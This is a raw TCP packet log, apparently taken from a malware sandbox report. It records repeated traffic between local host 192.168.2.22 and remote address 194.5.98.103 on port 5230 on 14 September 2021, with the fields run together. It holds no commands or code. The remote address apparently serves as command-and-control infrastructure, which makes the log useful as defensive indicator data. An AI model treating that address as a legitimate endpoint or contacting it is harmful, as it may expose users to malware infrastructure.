                                  Sep 14, 2021 21:49:22.597692013 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.597738981 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.597780943 CEST491775230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:22.597851992 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.597950935 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.597991943 CEST491775230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:22.598040104 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.598114967 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.598186970 CEST491775230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:22.598270893 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.598453045 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.598484039 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.598499060 CEST491775230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:22.598516941 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.598653078 CEST491775230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:22.598656893 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.598701000 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.598740101 CEST491775230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:22.598743916 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.598939896 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.598990917 CEST491775230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:22.753757954 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.753837109 CEST491775230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:22.754368067 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.754620075 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.754853010 CEST491775230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:22.755259037 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.755422115 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.755449057 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.755506039 CEST491775230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:22.755636930 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.755666971 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.755759954 CEST491775230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:22.755784988 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.755815983 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.755927086 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.755986929 CEST491775230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:22.756215096 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.756244898 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.756371021 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.756469965 CEST491775230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:22.756645918 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.756702900 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.756828070 CEST491775230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:22.756861925 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.756962061 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.757031918 CEST491775230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:22.757101059 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.757349014 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.757445097 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.757512093 CEST491775230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:22.757574081 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.757721901 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.758027077 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.758079052 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.758117914 CEST491775230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:22.758187056 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.758280039 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.758335114 CEST491775230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:22.758440018 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.758543015 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.758632898 CEST491775230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:22.758734941 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.758775949 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.758932114 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.758968115 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.758999109 CEST491775230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:22.759016037 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.759088039 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.759216070 CEST491775230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:22.759325981 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.759370089 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.759443045 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.759463072 CEST491775230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:22.759480953 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.759572029 CEST491775230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:22.759681940 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.759903908 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.759947062 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.759983063 CEST491775230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:22.760097980 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.760148048 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.760185957 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.760222912 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.760261059 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.760289907 CEST491775230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:22.760309935 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.760363102 CEST491775230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:22.760426998 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.760466099 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.760502100 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.760540009 CEST491775230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:22.909049988 CEST491775230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:22.910619020 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.910753965 CEST491775230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:22.910842896 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.910962105 CEST491775230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:22.911062956 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.911108017 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.911158085 CEST491775230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:22.911195040 CEST491775230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:22.911230087 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.911287069 CEST491775230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:22.911288977 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.911349058 CEST491775230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:22.911751986 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.911813974 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.911837101 CEST491775230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:22.911865950 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.911883116 CEST491775230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:22.911993980 CEST491775230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:22.912023067 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.912089109 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.912116051 CEST491775230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:22.912223101 CEST491775230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:22.912365913 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.912426949 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.912466049 CEST491775230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:22.912492037 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.912535906 CEST491775230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:22.912894011 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.912986040 CEST491775230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:22.913105965 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.913139105 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.913166046 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.913183928 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.913225889 CEST491775230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:22.913276911 CEST491775230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:22.913291931 CEST491775230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:22.913296938 CEST491775230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:22.913301945 CEST491775230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:22.913312912 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.913340092 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.913414001 CEST491775230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:22.913480043 CEST491775230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:22.913795948 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.913949966 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.914671898 CEST491775230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:22.914684057 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.914709091 CEST491775230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:22.914709091 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.914773941 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.914798021 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.914802074 CEST491775230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:22.914819002 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.914848089 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.914896965 CEST491775230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:22.914930105 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.914936066 CEST491775230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:22.914946079 CEST491775230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:22.914952993 CEST491775230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:22.914959908 CEST491775230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:22.915018082 CEST491775230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:22.915108919 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.915149927 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.915205956 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.915234089 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.915241003 CEST491775230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:22.915258884 CEST491775230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:22.915339947 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.915375948 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.915388107 CEST491775230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:22.915404081 CEST491775230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:22.915412903 CEST491775230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:22.915474892 CEST491775230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:22.915855885 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.915954113 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.916009903 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.916054010 CEST491775230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:22.916075945 CEST491775230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:22.916079044 CEST491775230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:22.916090012 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.916137934 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.916172028 CEST491775230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:22.916230917 CEST491775230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:22.916275978 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.916302919 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.916327000 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.916374922 CEST491775230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:22.916408062 CEST491775230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:22.916414976 CEST491775230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:22.916450977 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.916476965 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.916501999 CEST491775230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:22.916563988 CEST491775230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:22.916618109 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.916641951 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.916706085 CEST491775230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:22.916721106 CEST523049177194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:22.916764975 CEST491775230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:22.916790009 CEST491775230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:27.034641981 CEST491785230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:27.190417051 CEST523049178194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:27.190574884 CEST491785230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:27.191212893 CEST491785230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:27.358963966 CEST523049178194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:27.359085083 CEST491785230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:27.566777945 CEST523049178194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:27.566876888 CEST491785230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:27.723191977 CEST523049178194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:27.723351955 CEST491785230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:27.930085897 CEST523049178194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:27.930141926 CEST491785230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:28.136389017 CEST523049178194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:28.136622906 CEST491785230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:28.149199963 CEST523049178194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:28.149249077 CEST523049178194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:28.149307966 CEST523049178194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:28.149339914 CEST523049178194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:28.149440050 CEST491785230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:28.149502993 CEST491785230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:28.306196928 CEST523049178194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:28.306248903 CEST523049178194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:28.306282997 CEST523049178194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:28.306319952 CEST523049178194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:28.306317091 CEST491785230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:28.306365967 CEST491785230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:28.306454897 CEST523049178194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:28.306499958 CEST523049178194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:28.306534052 CEST491785230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:28.306545019 CEST523049178194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:28.306580067 CEST523049178194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:28.306605101 CEST491785230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:28.463892937 CEST523049178194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:28.463937998 CEST523049178194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:28.463968039 CEST523049178194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:28.463998079 CEST523049178194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:28.464020967 CEST491785230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:28.464026928 CEST523049178194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:28.464071989 CEST491785230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:28.464080095 CEST491785230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:28.464180946 CEST523049178194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:28.464201927 CEST523049178194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:28.464271069 CEST491785230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:28.464276075 CEST523049178194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:28.464306116 CEST523049178194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:28.464397907 CEST491785230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:28.464442015 CEST523049178194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:28.464466095 CEST523049178194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:28.464494944 CEST523049178194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:28.464526892 CEST491785230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:28.464643955 CEST523049178194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:28.464675903 CEST523049178194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:28.464699984 CEST491785230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:28.621711969 CEST523049178194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:28.621740103 CEST523049178194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:28.621754885 CEST523049178194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:28.621772051 CEST523049178194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:28.621841908 CEST491785230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:28.621845961 CEST523049178194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:28.621860981 CEST523049178194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:28.621932983 CEST491785230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:28.621952057 CEST491785230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:28.622029066 CEST523049178194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:28.622049093 CEST523049178194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:28.622112989 CEST491785230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:28.622158051 CEST523049178194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:28.622178078 CEST523049178194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:28.622215033 CEST491785230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:28.622292042 CEST523049178194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:28.622311115 CEST523049178194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:28.622354031 CEST491785230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:28.622535944 CEST523049178194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:28.622606039 CEST491785230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:28.622608900 CEST523049178194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:28.622658968 CEST523049178194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:28.622674942 CEST523049178194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:28.622705936 CEST523049178194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:28.622720003 CEST491785230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:28.622750044 CEST491785230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:28.622893095 CEST523049178194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:28.622911930 CEST523049178194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:28.622962952 CEST491785230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:28.623275995 CEST523049178194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:28.623296022 CEST523049178194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:28.623306990 CEST523049178194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:28.623368979 CEST491785230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:28.623387098 CEST523049178194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:28.623405933 CEST523049178194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:28.623416901 CEST523049178194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:28.623429060 CEST523049178194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:28.623486042 CEST523049178194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:28.623537064 CEST491785230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:28.623560905 CEST491785230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:28.623670101 CEST523049178194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:28.623712063 CEST523049178194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:28.624085903 CEST491785230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:28.780343056 CEST523049178194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:28.780374050 CEST523049178194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:28.780420065 CEST523049178194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:28.780437946 CEST523049178194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:28.780450106 CEST523049178194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:28.780463934 CEST491785230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:28.780487061 CEST491785230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:28.780592918 CEST523049178194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:28.780644894 CEST491785230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:28.780781031 CEST523049178194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:28.781006098 CEST523049178194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:28.781027079 CEST523049178194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:28.781054020 CEST491785230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:28.781205893 CEST523049178194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:28.781352043 CEST523049178194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:28.781371117 CEST523049178194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:28.781394958 CEST491785230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:28.781497955 CEST523049178194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:28.781557083 CEST523049178194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:28.781600952 CEST491785230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:28.781764984 CEST523049178194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:28.781785011 CEST523049178194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:28.781825066 CEST491785230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:28.781835079 CEST523049178194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:28.782000065 CEST523049178194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:28.782017946 CEST523049178194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:28.782057047 CEST491785230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:28.782264948 CEST523049178194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:28.782284021 CEST523049178194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:28.782299995 CEST523049178194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:28.782320976 CEST491785230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:28.782394886 CEST523049178194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:28.782438993 CEST523049178194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:28.782480955 CEST491785230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:28.782506943 CEST523049178194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:28.782615900 CEST523049178194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:28.782663107 CEST523049178194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:28.782705069 CEST491785230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:28.782718897 CEST523049178194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:28.782797098 CEST523049178194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:28.782953978 CEST523049178194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:28.782989025 CEST523049178194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:28.783015966 CEST491785230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:28.783284903 CEST523049178194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:28.783339977 CEST491785230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:28.783417940 CEST523049178194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:28.783488989 CEST523049178194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:28.783550978 CEST523049178194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:28.783596992 CEST491785230192.168.2.22194.5.98.103
                                  Sep 14, 2021 21:49:28.783623934 CEST523049178194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:28.783695936 CEST523049178194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:28.783783913 CEST523049178194.5.98.103192.168.2.22
                                  Sep 14, 2021 21:49:28.783833981 CEST491785230192.168.2.22194.5.98.103
